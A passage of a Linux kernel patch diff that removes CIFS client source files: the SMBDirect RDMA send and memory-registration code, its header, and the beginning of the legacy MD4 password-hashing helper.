+-	int size;
+-	unsigned int buflen, remaining_data_length;
+-	unsigned int offset, remaining_vec_data_length;
+-	int start, i, j;
+-	int max_iov_size =
+-		info->max_send_size - sizeof(struct smbd_data_transfer);
+-	struct kvec *iov;
+-	int rc;
+-	struct smb_rqst *rqst;
+-	int rqst_idx;
+-
+-	if (info->transport_status != SMBD_CONNECTED)
+-		return -EAGAIN;
+-
+-	/*
+-	 * Add in the page array if there is one. The caller needs to set
+-	 * rq_tailsz to PAGE_SIZE when the buffer has multiple pages and
+-	 * ends at page boundary
+-	 */
+-	remaining_data_length = 0;
+-	for (i = 0; i < num_rqst; i++)
+-		remaining_data_length += smb_rqst_len(server, &rqst_array[i]);
+-
+-	if (unlikely(remaining_data_length > info->max_fragmented_send_size)) {
+-		/* assertion: payload never exceeds negotiated maximum */
+-		log_write(ERR, "payload size %d > max size %d\n",
+-			remaining_data_length, info->max_fragmented_send_size);
+-		return -EINVAL;
+-	}
+-
+-	log_write(INFO, "num_rqst=%d total length=%u\n",
+-			num_rqst, remaining_data_length);
+-
+-	rqst_idx = 0;
+-	do {
+-		rqst = &rqst_array[rqst_idx];
+-		iov = rqst->rq_iov;
+-
+-		cifs_dbg(FYI, "Sending smb (RDMA): idx=%d smb_len=%lu\n",
+-			rqst_idx, smb_rqst_len(server, rqst));
+-		remaining_vec_data_length = 0;
+-		for (i = 0; i < rqst->rq_nvec; i++) {
+-			remaining_vec_data_length += iov[i].iov_len;
+-			dump_smb(iov[i].iov_base, iov[i].iov_len);
+-		}
+-
+-		log_write(INFO, "rqst_idx=%d nvec=%d rqst->rq_npages=%d rq_pagesz=%d rq_tailsz=%d buflen=%lu\n",
+-			  rqst_idx, rqst->rq_nvec,
+-			  rqst->rq_npages, rqst->rq_pagesz,
+-			  rqst->rq_tailsz, smb_rqst_len(server, rqst));
+-
+-		start = 0;
+-		offset = 0;
+-		do {
+-			buflen = 0;
+-			i = start;
+-			j = 0;
+-			while (i < rqst->rq_nvec &&
+-				j < SMBDIRECT_MAX_SEND_SGE - 1 &&
+-				buflen < max_iov_size) {
+-
+-				vecs[j].iov_base = iov[i].iov_base + offset;
+-				if (buflen + iov[i].iov_len > max_iov_size) {
+-					vecs[j].iov_len =
+-						max_iov_size - iov[i].iov_len;
+-					buflen = max_iov_size;
+-					offset = vecs[j].iov_len;
+-				} else {
+-					vecs[j].iov_len =
+-						iov[i].iov_len - offset;
+-					buflen += vecs[j].iov_len;
+-					offset = 0;
+-					++i;
+-				}
+-				++j;
+-			}
+-
+-			remaining_vec_data_length -= buflen;
+-			remaining_data_length -= buflen;
+-			log_write(INFO, "sending %s iov[%d] from start=%d nvecs=%d remaining_data_length=%d\n",
+-					remaining_vec_data_length > 0 ?
+-						"partial" : "complete",
+-					rqst->rq_nvec, start, j,
+-					remaining_data_length);
+-
+-			start = i;
+-			rc = smbd_post_send_data(info, vecs, j, remaining_data_length);
+-			if (rc)
+-				goto done;
+-		} while (remaining_vec_data_length > 0);
+-
+-		/* now sending pages if there are any */
+-		for (i = 0; i < rqst->rq_npages; i++) {
+-			rqst_page_get_length(rqst, i, &buflen, &offset);
+-			nvecs = (buflen + max_iov_size - 1) / max_iov_size;
+-			log_write(INFO, "sending pages buflen=%d nvecs=%d\n",
+-				buflen, nvecs);
+-			for (j = 0; j < nvecs; j++) {
+-				size = min_t(unsigned int, max_iov_size, remaining_data_length);
+-				remaining_data_length -= size;
+-				log_write(INFO, "sending pages i=%d offset=%d size=%d remaining_data_length=%d\n",
+-					  i, j * max_iov_size + offset, size,
+-					  remaining_data_length);
+-				rc = smbd_post_send_page(
+-					info, rqst->rq_pages[i],
+-					j*max_iov_size + offset,
+-					size, remaining_data_length);
+-				if (rc)
+-					goto done;
+-			}
+-		}
+-	} while (++rqst_idx < num_rqst);
+-
+-done:
+-	/*
+-	 * As an optimization, we don't wait for individual I/O to finish
+-	 * before sending the next one.
+-	 * Send them all and wait for pending send count to get to 0
+-	 * that means all the I/Os have been out and we are good to return
+-	 */
+-
+-	wait_event(info->wait_send_pending,
+-		atomic_read(&info->send_pending) == 0);
+-
+-	return rc;
+-}
+-
+-static void register_mr_done(struct ib_cq *cq, struct ib_wc *wc)
+-{
+-	struct smbd_mr *mr;
+-	struct ib_cqe *cqe;
+-
+-	if (wc->status) {
+-		log_rdma_mr(ERR, "status=%d\n", wc->status);
+-		cqe = wc->wr_cqe;
+-		mr = container_of(cqe, struct smbd_mr, cqe);
+-		smbd_disconnect_rdma_connection(mr->conn);
+-	}
+-}
+-
+-/*
+- * The work queue function that recovers MRs
+- * We need to call ib_dereg_mr() and ib_alloc_mr() before this MR can be used
+- * again. Both calls are slow, so finish them in a workqueue. This will not
+- * block I/O path.
+- * There is one workqueue that recovers MRs, there is no need to lock as the
+- * I/O requests calling smbd_register_mr will never update the links in the
+- * mr_list.
+- */
+-static void smbd_mr_recovery_work(struct work_struct *work)
+-{
+-	struct smbd_connection *info =
+-		container_of(work, struct smbd_connection, mr_recovery_work);
+-	struct smbd_mr *smbdirect_mr;
+-	int rc;
+-
+-	list_for_each_entry(smbdirect_mr, &info->mr_list, list) {
+-		if (smbdirect_mr->state == MR_ERROR) {
+-
+-			/* recover this MR entry */
+-			rc = ib_dereg_mr(smbdirect_mr->mr);
+-			if (rc) {
+-				log_rdma_mr(ERR,
+-					"ib_dereg_mr failed rc=%x\n",
+-					rc);
+-				smbd_disconnect_rdma_connection(info);
+-				continue;
+-			}
+-
+-			smbdirect_mr->mr = ib_alloc_mr(
+-				info->pd, info->mr_type,
+-				info->max_frmr_depth);
+-			if (IS_ERR(smbdirect_mr->mr)) {
+-				log_rdma_mr(ERR, "ib_alloc_mr failed mr_type=%x max_frmr_depth=%x\n",
+-					    info->mr_type,
+-					    info->max_frmr_depth);
+-				smbd_disconnect_rdma_connection(info);
+-				continue;
+-			}
+-		} else
+-			/* This MR is being used, don't recover it */
+-			continue;
+-
+-		smbdirect_mr->state = MR_READY;
+-
+-		/* smbdirect_mr->state is updated by this function
+-		 * and is read and updated by I/O issuing CPUs trying
+-		 * to get a MR, the call to atomic_inc_return
+-		 * implicates a memory barrier and guarantees this
+-		 * value is updated before waking up any calls to
+-		 * get_mr() from the I/O issuing CPUs
+-		 */
+-		if (atomic_inc_return(&info->mr_ready_count) == 1)
+-			wake_up_interruptible(&info->wait_mr);
+-	}
+-}
+-
+-static void destroy_mr_list(struct smbd_connection *info)
+-{
+-	struct smbd_mr *mr, *tmp;
+-
+-	cancel_work_sync(&info->mr_recovery_work);
+-	list_for_each_entry_safe(mr, tmp, &info->mr_list, list) {
+-		if (mr->state == MR_INVALIDATED)
+-			ib_dma_unmap_sg(info->id->device, mr->sgl,
+-				mr->sgl_count, mr->dir);
+-		ib_dereg_mr(mr->mr);
+-		kfree(mr->sgl);
+-		kfree(mr);
+-	}
+-}
+-
+-/*
+- * Allocate MRs used for RDMA read/write
+- * The number of MRs will not exceed hardware capability in responder_resources
+- * All MRs are kept in mr_list. The MR can be recovered after it's used
+- * Recovery is done in smbd_mr_recovery_work. The content of list entry changes
+- * as MRs are used and recovered for I/O, but the list links will not change
+- */
+-static int allocate_mr_list(struct smbd_connection *info)
+-{
+-	int i;
+-	struct smbd_mr *smbdirect_mr, *tmp;
+-
+-	INIT_LIST_HEAD(&info->mr_list);
+-	init_waitqueue_head(&info->wait_mr);
+-	spin_lock_init(&info->mr_list_lock);
+-	atomic_set(&info->mr_ready_count, 0);
+-	atomic_set(&info->mr_used_count, 0);
+-	init_waitqueue_head(&info->wait_for_mr_cleanup);
+-	INIT_WORK(&info->mr_recovery_work, smbd_mr_recovery_work);
+-	/* Allocate more MRs (2x) than hardware responder_resources */
+-	for (i = 0; i < info->responder_resources * 2; i++) {
+-		smbdirect_mr = kzalloc(sizeof(*smbdirect_mr), GFP_KERNEL);
+-		if (!smbdirect_mr)
+-			goto out;
+-		smbdirect_mr->mr = ib_alloc_mr(info->pd, info->mr_type,
+-					info->max_frmr_depth);
+-		if (IS_ERR(smbdirect_mr->mr)) {
+-			log_rdma_mr(ERR, "ib_alloc_mr failed mr_type=%x max_frmr_depth=%x\n",
+-				    info->mr_type, info->max_frmr_depth);
+-			goto out;
+-		}
+-		smbdirect_mr->sgl = kcalloc(
+-					info->max_frmr_depth,
+-					sizeof(struct scatterlist),
+-					GFP_KERNEL);
+-		if (!smbdirect_mr->sgl) {
+-			log_rdma_mr(ERR, "failed to allocate sgl\n");
+-			ib_dereg_mr(smbdirect_mr->mr);
+-			goto out;
+-		}
+-		smbdirect_mr->state = MR_READY;
+-		smbdirect_mr->conn = info;
+-
+-		list_add_tail(&smbdirect_mr->list, &info->mr_list);
+-		atomic_inc(&info->mr_ready_count);
+-	}
+-	return 0;
+-
+-out:
+-	kfree(smbdirect_mr);
+-
+-	list_for_each_entry_safe(smbdirect_mr, tmp, &info->mr_list, list) {
+-		list_del(&smbdirect_mr->list);
+-		ib_dereg_mr(smbdirect_mr->mr);
+-		kfree(smbdirect_mr->sgl);
+-		kfree(smbdirect_mr);
+-	}
+-	return -ENOMEM;
+-}
+-
+-/*
+- * Get a MR from mr_list. This function waits until there is at least one
+- * MR available in the list. It may access the list while the
+- * smbd_mr_recovery_work is recovering the MR list. This doesn't need a lock
+- * as they never modify the same places. However, there may be several CPUs
+- * issueing I/O trying to get MR at the same time, mr_list_lock is used to
+- * protect this situation.
+- */
+-static struct smbd_mr *get_mr(struct smbd_connection *info)
+-{
+-	struct smbd_mr *ret;
+-	int rc;
+-again:
+-	rc = wait_event_interruptible(info->wait_mr,
+-		atomic_read(&info->mr_ready_count) ||
+-		info->transport_status != SMBD_CONNECTED);
+-	if (rc) {
+-		log_rdma_mr(ERR, "wait_event_interruptible rc=%x\n", rc);
+-		return NULL;
+-	}
+-
+-	if (info->transport_status != SMBD_CONNECTED) {
+-		log_rdma_mr(ERR, "info->transport_status=%x\n",
+-			info->transport_status);
+-		return NULL;
+-	}
+-
+-	spin_lock(&info->mr_list_lock);
+-	list_for_each_entry(ret, &info->mr_list, list) {
+-		if (ret->state == MR_READY) {
+-			ret->state = MR_REGISTERED;
+-			spin_unlock(&info->mr_list_lock);
+-			atomic_dec(&info->mr_ready_count);
+-			atomic_inc(&info->mr_used_count);
+-			return ret;
+-		}
+-	}
+-
+-	spin_unlock(&info->mr_list_lock);
+-	/*
+-	 * It is possible that we could fail to get MR because other processes may
+-	 * try to acquire a MR at the same time. If this is the case, retry it.
+-	 */
+-	goto again;
+-}
+-
+-/*
+- * Register memory for RDMA read/write
+- * pages[]: the list of pages to register memory with
+- * num_pages: the number of pages to register
+- * tailsz: if non-zero, the bytes to register in the last page
+- * writing: true if this is a RDMA write (SMB read), false for RDMA read
+- * need_invalidate: true if this MR needs to be locally invalidated after I/O
+- * return value: the MR registered, NULL if failed.
+- */
+-struct smbd_mr *smbd_register_mr(
+-	struct smbd_connection *info, struct page *pages[], int num_pages,
+-	int offset, int tailsz, bool writing, bool need_invalidate)
+-{
+-	struct smbd_mr *smbdirect_mr;
+-	int rc, i;
+-	enum dma_data_direction dir;
+-	struct ib_reg_wr *reg_wr;
+-
+-	if (num_pages > info->max_frmr_depth) {
+-		log_rdma_mr(ERR, "num_pages=%d max_frmr_depth=%d\n",
+-			num_pages, info->max_frmr_depth);
+-		return NULL;
+-	}
+-
+-	smbdirect_mr = get_mr(info);
+-	if (!smbdirect_mr) {
+-		log_rdma_mr(ERR, "get_mr returning NULL\n");
+-		return NULL;
+-	}
+-	smbdirect_mr->need_invalidate = need_invalidate;
+-	smbdirect_mr->sgl_count = num_pages;
+-	sg_init_table(smbdirect_mr->sgl, num_pages);
+-
+-	log_rdma_mr(INFO, "num_pages=0x%x offset=0x%x tailsz=0x%x\n",
+-			num_pages, offset, tailsz);
+-
+-	if (num_pages == 1) {
+-		sg_set_page(&smbdirect_mr->sgl[0], pages[0], tailsz, offset);
+-		goto skip_multiple_pages;
+-	}
+-
+-	/* We have at least two pages to register */
+-	sg_set_page(
+-		&smbdirect_mr->sgl[0], pages[0], PAGE_SIZE - offset, offset);
+-	i = 1;
+-	while (i < num_pages - 1) {
+-		sg_set_page(&smbdirect_mr->sgl[i], pages[i], PAGE_SIZE, 0);
+-		i++;
+-	}
+-	sg_set_page(&smbdirect_mr->sgl[i], pages[i],
+-		tailsz ? tailsz : PAGE_SIZE, 0);
+-
+-skip_multiple_pages:
+-	dir = writing ? DMA_FROM_DEVICE : DMA_TO_DEVICE;
+-	smbdirect_mr->dir = dir;
+-	rc = ib_dma_map_sg(info->id->device, smbdirect_mr->sgl, num_pages, dir);
+-	if (!rc) {
+-		log_rdma_mr(ERR, "ib_dma_map_sg num_pages=%x dir=%x rc=%x\n",
+-			num_pages, dir, rc);
+-		goto dma_map_error;
+-	}
+-
+-	rc = ib_map_mr_sg(smbdirect_mr->mr, smbdirect_mr->sgl, num_pages,
+-		NULL, PAGE_SIZE);
+-	if (rc != num_pages) {
+-		log_rdma_mr(ERR,
+-			"ib_map_mr_sg failed rc = %d num_pages = %x\n",
+-			rc, num_pages);
+-		goto map_mr_error;
+-	}
+-
+-	ib_update_fast_reg_key(smbdirect_mr->mr,
+-		ib_inc_rkey(smbdirect_mr->mr->rkey));
+-	reg_wr = &smbdirect_mr->wr;
+-	reg_wr->wr.opcode = IB_WR_REG_MR;
+-	smbdirect_mr->cqe.done = register_mr_done;
+-	reg_wr->wr.wr_cqe = &smbdirect_mr->cqe;
+-	reg_wr->wr.num_sge = 0;
+-	reg_wr->wr.send_flags = IB_SEND_SIGNALED;
+-	reg_wr->mr = smbdirect_mr->mr;
+-	reg_wr->key = smbdirect_mr->mr->rkey;
+-	reg_wr->access = writing ?
+-			IB_ACCESS_REMOTE_WRITE | IB_ACCESS_LOCAL_WRITE :
+-			IB_ACCESS_REMOTE_READ;
+-
+-	/*
+-	 * There is no need for waiting for complemtion on ib_post_send
+-	 * on IB_WR_REG_MR. Hardware enforces a barrier and order of execution
+-	 * on the next ib_post_send when we actaully send I/O to remote peer
+-	 */
+-	rc = ib_post_send(info->id->qp, &reg_wr->wr, NULL);
+-	if (!rc)
+-		return smbdirect_mr;
+-
+-	log_rdma_mr(ERR, "ib_post_send failed rc=%x reg_wr->key=%x\n",
+-		rc, reg_wr->key);
+-
+-	/* If all failed, attempt to recover this MR by setting it MR_ERROR*/
+-map_mr_error:
+-	ib_dma_unmap_sg(info->id->device, smbdirect_mr->sgl,
+-		smbdirect_mr->sgl_count, smbdirect_mr->dir);
+-
+-dma_map_error:
+-	smbdirect_mr->state = MR_ERROR;
+-	if (atomic_dec_and_test(&info->mr_used_count))
+-		wake_up(&info->wait_for_mr_cleanup);
+-
+-	smbd_disconnect_rdma_connection(info);
+-
+-	return NULL;
+-}
+-
+-static void local_inv_done(struct ib_cq *cq, struct ib_wc *wc)
+-{
+-	struct smbd_mr *smbdirect_mr;
+-	struct ib_cqe *cqe;
+-
+-	cqe = wc->wr_cqe;
+-	smbdirect_mr = container_of(cqe, struct smbd_mr, cqe);
+-	smbdirect_mr->state = MR_INVALIDATED;
+-	if (wc->status != IB_WC_SUCCESS) {
+-		log_rdma_mr(ERR, "invalidate failed status=%x\n", wc->status);
+-		smbdirect_mr->state = MR_ERROR;
+-	}
+-	complete(&smbdirect_mr->invalidate_done);
+-}
+-
+-/*
+- * Deregister a MR after I/O is done
+- * This function may wait if remote invalidation is not used
+- * and we have to locally invalidate the buffer to prevent data is being
+- * modified by remote peer after upper layer consumes it
+- */
+-int smbd_deregister_mr(struct smbd_mr *smbdirect_mr)
+-{
+-	struct ib_send_wr *wr;
+-	struct smbd_connection *info = smbdirect_mr->conn;
+-	int rc = 0;
+-
+-	if (smbdirect_mr->need_invalidate) {
+-		/* Need to finish local invalidation before returning */
+-		wr = &smbdirect_mr->inv_wr;
+-		wr->opcode = IB_WR_LOCAL_INV;
+-		smbdirect_mr->cqe.done = local_inv_done;
+-		wr->wr_cqe = &smbdirect_mr->cqe;
+-		wr->num_sge = 0;
+-		wr->ex.invalidate_rkey = smbdirect_mr->mr->rkey;
+-		wr->send_flags = IB_SEND_SIGNALED;
+-
+-		init_completion(&smbdirect_mr->invalidate_done);
+-		rc = ib_post_send(info->id->qp, wr, NULL);
+-		if (rc) {
+-			log_rdma_mr(ERR, "ib_post_send failed rc=%x\n", rc);
+-			smbd_disconnect_rdma_connection(info);
+-			goto done;
+-		}
+-		wait_for_completion(&smbdirect_mr->invalidate_done);
+-		smbdirect_mr->need_invalidate = false;
+-	} else
+-		/*
+-		 * For remote invalidation, just set it to MR_INVALIDATED
+-		 * and defer to mr_recovery_work to recover the MR for next use
+-		 */
+-		smbdirect_mr->state = MR_INVALIDATED;
+-
+-	if (smbdirect_mr->state == MR_INVALIDATED) {
+-		ib_dma_unmap_sg(
+-			info->id->device, smbdirect_mr->sgl,
+-			smbdirect_mr->sgl_count,
+-			smbdirect_mr->dir);
+-		smbdirect_mr->state = MR_READY;
+-		if (atomic_inc_return(&info->mr_ready_count) == 1)
+-			wake_up_interruptible(&info->wait_mr);
+-	} else
+-		/*
+-		 * Schedule the work to do MR recovery for future I/Os MR
+-		 * recovery is slow and don't want it to block current I/O
+-		 */
+-		queue_work(info->workqueue, &info->mr_recovery_work);
+-
+-done:
+-	if (atomic_dec_and_test(&info->mr_used_count))
+-		wake_up(&info->wait_for_mr_cleanup);
+-
+-	return rc;
+-}
+diff --git a/fs/cifs/smbdirect.h b/fs/cifs/smbdirect.h
+deleted file mode 100644
+index 207ef979cd51c..0000000000000
+--- a/fs/cifs/smbdirect.h
++++ /dev/null
+@@ -1,320 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2017, Microsoft Corporation.
+- *
+- *   Author(s): Long Li <longli@microsoft.com>
+- */
+-#ifndef _SMBDIRECT_H
+-#define _SMBDIRECT_H
+-
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-#define cifs_rdma_enabled(server)	((server)->rdma)
+-
+-#include "cifsglob.h"
+-#include <rdma/ib_verbs.h>
+-#include <rdma/rdma_cm.h>
+-#include <linux/mempool.h>
+-
+-extern int rdma_readwrite_threshold;
+-extern int smbd_max_frmr_depth;
+-extern int smbd_keep_alive_interval;
+-extern int smbd_max_receive_size;
+-extern int smbd_max_fragmented_recv_size;
+-extern int smbd_max_send_size;
+-extern int smbd_send_credit_target;
+-extern int smbd_receive_credit_max;
+-
+-enum keep_alive_status {
+-	KEEP_ALIVE_NONE,
+-	KEEP_ALIVE_PENDING,
+-	KEEP_ALIVE_SENT,
+-};
+-
+-enum smbd_connection_status {
+-	SMBD_CREATED,
+-	SMBD_CONNECTING,
+-	SMBD_CONNECTED,
+-	SMBD_NEGOTIATE_FAILED,
+-	SMBD_DISCONNECTING,
+-	SMBD_DISCONNECTED,
+-	SMBD_DESTROYED
+-};
+-
+-/*
+- * The context for the SMBDirect transport
+- * Everything related to the transport is here. It has several logical parts
+- * 1. RDMA related structures
+- * 2. SMBDirect connection parameters
+- * 3. Memory registrations
+- * 4. Receive and reassembly queues for data receive path
+- * 5. mempools for allocating packets
+- */
+-struct smbd_connection {
+-	enum smbd_connection_status transport_status;
+-
+-	/* RDMA related */
+-	struct rdma_cm_id *id;
+-	struct ib_qp_init_attr qp_attr;
+-	struct ib_pd *pd;
+-	struct ib_cq *send_cq, *recv_cq;
+-	struct ib_device_attr dev_attr;
+-	int ri_rc;
+-	struct completion ri_done;
+-	wait_queue_head_t conn_wait;
+-	wait_queue_head_t disconn_wait;
+-
+-	struct completion negotiate_completion;
+-	bool negotiate_done;
+-
+-	struct work_struct disconnect_work;
+-	struct work_struct post_send_credits_work;
+-
+-	spinlock_t lock_new_credits_offered;
+-	int new_credits_offered;
+-
+-	/* Connection parameters defined in [MS-SMBD] 3.1.1.1 */
+-	int receive_credit_max;
+-	int send_credit_target;
+-	int max_send_size;
+-	int max_fragmented_recv_size;
+-	int max_fragmented_send_size;
+-	int max_receive_size;
+-	int keep_alive_interval;
+-	int max_readwrite_size;
+-	enum keep_alive_status keep_alive_requested;
+-	int protocol;
+-	atomic_t send_credits;
+-	atomic_t receive_credits;
+-	int receive_credit_target;
+-	int fragment_reassembly_remaining;
+-
+-	/* Memory registrations */
+-	/* Maximum number of RDMA read/write outstanding on this connection */
+-	int responder_resources;
+-	/* Maximum number of pages in a single RDMA write/read on this connection */
+-	int max_frmr_depth;
+-	/*
+-	 * If payload is less than or equal to the threshold,
+-	 * use RDMA send/recv to send upper layer I/O.
+-	 * If payload is more than the threshold,
+-	 * use RDMA read/write through memory registration for I/O.
+-	 */
+-	int rdma_readwrite_threshold;
+-	enum ib_mr_type mr_type;
+-	struct list_head mr_list;
+-	spinlock_t mr_list_lock;
+-	/* The number of available MRs ready for memory registration */
+-	atomic_t mr_ready_count;
+-	atomic_t mr_used_count;
+-	wait_queue_head_t wait_mr;
+-	struct work_struct mr_recovery_work;
+-	/* Used by transport to wait until all MRs are returned */
+-	wait_queue_head_t wait_for_mr_cleanup;
+-
+-	/* Activity accoutning */
+-	atomic_t send_pending;
+-	wait_queue_head_t wait_send_pending;
+-	wait_queue_head_t wait_post_send;
+-
+-	/* Receive queue */
+-	struct list_head receive_queue;
+-	int count_receive_queue;
+-	spinlock_t receive_queue_lock;
+-
+-	struct list_head empty_packet_queue;
+-	int count_empty_packet_queue;
+-	spinlock_t empty_packet_queue_lock;
+-
+-	wait_queue_head_t wait_receive_queues;
+-
+-	/* Reassembly queue */
+-	struct list_head reassembly_queue;
+-	spinlock_t reassembly_queue_lock;
+-	wait_queue_head_t wait_reassembly_queue;
+-
+-	/* total data length of reassembly queue */
+-	int reassembly_data_length;
+-	int reassembly_queue_length;
+-	/* the offset to first buffer in reassembly queue */
+-	int first_entry_offset;
+-
+-	bool send_immediate;
+-
+-	wait_queue_head_t wait_send_queue;
+-
+-	/*
+-	 * Indicate if we have received a full packet on the connection
+-	 * This is used to identify the first SMBD packet of a assembled
+-	 * payload (SMB packet) in reassembly queue so we can return a
+-	 * RFC1002 length to upper layer to indicate the length of the SMB
+-	 * packet received
+-	 */
+-	bool full_packet_received;
+-
+-	struct workqueue_struct *workqueue;
+-	struct delayed_work idle_timer_work;
+-
+-	/* Memory pool for preallocating buffers */
+-	/* request pool for RDMA send */
+-	struct kmem_cache *request_cache;
+-	mempool_t *request_mempool;
+-
+-	/* response pool for RDMA receive */
+-	struct kmem_cache *response_cache;
+-	mempool_t *response_mempool;
+-
+-	/* for debug purposes */
+-	unsigned int count_get_receive_buffer;
+-	unsigned int count_put_receive_buffer;
+-	unsigned int count_reassembly_queue;
+-	unsigned int count_enqueue_reassembly_queue;
+-	unsigned int count_dequeue_reassembly_queue;
+-	unsigned int count_send_empty;
+-};
+-
+-enum smbd_message_type {
+-	SMBD_NEGOTIATE_RESP,
+-	SMBD_TRANSFER_DATA,
+-};
+-
+-#define SMB_DIRECT_RESPONSE_REQUESTED 0x0001
+-
+-/* SMBD negotiation request packet [MS-SMBD] 2.2.1 */
+-struct smbd_negotiate_req {
+-	__le16 min_version;
+-	__le16 max_version;
+-	__le16 reserved;
+-	__le16 credits_requested;
+-	__le32 preferred_send_size;
+-	__le32 max_receive_size;
+-	__le32 max_fragmented_size;
+-} __packed;
+-
+-/* SMBD negotiation response packet [MS-SMBD] 2.2.2 */
+-struct smbd_negotiate_resp {
+-	__le16 min_version;
+-	__le16 max_version;
+-	__le16 negotiated_version;
+-	__le16 reserved;
+-	__le16 credits_requested;
+-	__le16 credits_granted;
+-	__le32 status;
+-	__le32 max_readwrite_size;
+-	__le32 preferred_send_size;
+-	__le32 max_receive_size;
+-	__le32 max_fragmented_size;
+-} __packed;
+-
+-/* SMBD data transfer packet with payload [MS-SMBD] 2.2.3 */
+-struct smbd_data_transfer {
+-	__le16 credits_requested;
+-	__le16 credits_granted;
+-	__le16 flags;
+-	__le16 reserved;
+-	__le32 remaining_data_length;
+-	__le32 data_offset;
+-	__le32 data_length;
+-	__le32 padding;
+-	__u8 buffer[];
+-} __packed;
+-
+-/* The packet fields for a registered RDMA buffer */
+-struct smbd_buffer_descriptor_v1 {
+-	__le64 offset;
+-	__le32 token;
+-	__le32 length;
+-} __packed;
+-
+-/* Maximum number of SGEs used by smbdirect.c in any send work request */
+-#define SMBDIRECT_MAX_SEND_SGE	6
+-
+-/* The context for a SMBD request */
+-struct smbd_request {
+-	struct smbd_connection *info;
+-	struct ib_cqe cqe;
+-
+-	/* the SGE entries for this work request */
+-	struct ib_sge sge[SMBDIRECT_MAX_SEND_SGE];
+-	int num_sge;
+-
+-	/* SMBD packet header follows this structure */
+-	u8 packet[];
+-};
+-
+-/* Maximum number of SGEs used by smbdirect.c in any receive work request */
+-#define SMBDIRECT_MAX_RECV_SGE	1
+-
+-/* The context for a SMBD response */
+-struct smbd_response {
+-	struct smbd_connection *info;
+-	struct ib_cqe cqe;
+-	struct ib_sge sge;
+-
+-	enum smbd_message_type type;
+-
+-	/* Link to receive queue or reassembly queue */
+-	struct list_head list;
+-
+-	/* Indicate if this is the 1st packet of a payload */
+-	bool first_segment;
+-
+-	/* SMBD packet header and payload follows this structure */
+-	u8 packet[];
+-};
+-
+-/* Create a SMBDirect session */
+-struct smbd_connection *smbd_get_connection(
+-	struct TCP_Server_Info *server, struct sockaddr *dstaddr);
+-
+-/* Reconnect SMBDirect session */
+-int smbd_reconnect(struct TCP_Server_Info *server);
+-/* Destroy SMBDirect session */
+-void smbd_destroy(struct TCP_Server_Info *server);
+-
+-/* Interface for carrying upper layer I/O through send/recv */
+-int smbd_recv(struct smbd_connection *info, struct msghdr *msg);
+-int smbd_send(struct TCP_Server_Info *server,
+-	int num_rqst, struct smb_rqst *rqst);
+-
+-enum mr_state {
+-	MR_READY,
+-	MR_REGISTERED,
+-	MR_INVALIDATED,
+-	MR_ERROR
+-};
+-
+-struct smbd_mr {
+-	struct smbd_connection	*conn;
+-	struct list_head	list;
+-	enum mr_state		state;
+-	struct ib_mr		*mr;
+-	struct scatterlist	*sgl;
+-	int			sgl_count;
+-	enum dma_data_direction	dir;
+-	union {
+-		struct ib_reg_wr	wr;
+-		struct ib_send_wr	inv_wr;
+-	};
+-	struct ib_cqe		cqe;
+-	bool			need_invalidate;
+-	struct completion	invalidate_done;
+-};
+-
+-/* Interfaces to register and deregister MR for RDMA read/write */
+-struct smbd_mr *smbd_register_mr(
+-	struct smbd_connection *info, struct page *pages[], int num_pages,
+-	int offset, int tailsz, bool writing, bool need_invalidate);
+-int smbd_deregister_mr(struct smbd_mr *mr);
+-
+-#else
+-#define cifs_rdma_enabled(server)	0
+-struct smbd_connection {};
+-static inline void *smbd_get_connection(
+-	struct TCP_Server_Info *server, struct sockaddr *dstaddr) {return NULL;}
+-static inline int smbd_reconnect(struct TCP_Server_Info *server) {return -1; }
+-static inline void smbd_destroy(struct TCP_Server_Info *server) {}
+-static inline int smbd_recv(struct smbd_connection *info, struct msghdr *msg) {return -1; }
+-static inline int smbd_send(struct TCP_Server_Info *server, int num_rqst, struct smb_rqst *rqst) {return -1; }
+-#endif
+-
+-#endif
+diff --git a/fs/cifs/smbencrypt.c b/fs/cifs/smbencrypt.c
+deleted file mode 100644
+index 4a04877538691..0000000000000
+--- a/fs/cifs/smbencrypt.c
++++ /dev/null
+@@ -1,91 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+-   Unix SMB/Netbios implementation.
+-   Version 1.9.
+-   SMB parameters and setup
+-   Copyright (C) Andrew Tridgell 1992-2000
+-   Copyright (C) Luke Kenneth Casson Leighton 1996-2000
+-   Modified by Jeremy Allison 1995.
+-   Copyright (C) Andrew Bartlett <abartlet@samba.org> 2002-2003
+-   Modified by Steve French (sfrench@us.ibm.com) 2002-2003
+-
+-*/
+-
+-#include <linux/module.h>
+-#include <linux/slab.h>
+-#include <linux/fips.h>
+-#include <linux/fs.h>
+-#include <linux/string.h>
+-#include <linux/kernel.h>
+-#include <linux/random.h>
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-#include "cifsproto.h"
+-#include "../smbfs_common/md4.h"
+-
+-#ifndef false
+-#define false 0
+-#endif
+-#ifndef true
+-#define true 1
+-#endif
+-
+-/* following came from the other byteorder.h to avoid include conflicts */
+-#define CVAL(buf,pos) (((unsigned char *)(buf))[pos])
+-#define SSVALX(buf,pos,val) (CVAL(buf,pos)=(val)&0xFF,CVAL(buf,pos+1)=(val)>>8)
+-#define SSVAL(buf,pos,val) SSVALX((buf),(pos),((__u16)(val)))
+-
+-/* produce a md4 message digest from data of length n bytes */
+-static int
+-mdfour(unsigned char *md4_hash, unsigned char *link_str, int link_len)
+-{
+-	int rc;
+-	struct md4_ctx mctx;
+-
+-	rc = cifs_md4_init(&mctx);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not init MD4\n", __func__);
+-		goto mdfour_err;
+-	}
+-	rc = cifs_md4_update(&mctx, link_str, link_len);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not update MD4\n", __func__);
+-		goto mdfour_err;
+-	}
+-	rc = cifs_md4_final(&mctx, md4_hash);
+-	if (rc)
+-		cifs_dbg(VFS, "%s: Could not finalize MD4\n", __func__);
+-
+-
+-mdfour_err:
+-	return rc;
+-}
+-
+-/*
+- * Creates the MD4 Hash of the users password in NT UNICODE.
+- */
+-
+-int
+-E_md4hash(const unsigned char *passwd, unsigned char *p16,
+-	const struct nls_table *codepage)
+-{
+-	int rc;
+-	int len;
+-	__le16 wpwd[129];
+-
+-	/* Password cannot be longer than 128 characters */
+-	if (passwd) /* Password must be converted to NT unicode */
+-		len = cifs_strtoUTF16(wpwd, passwd, 128, codepage);
+-	else {
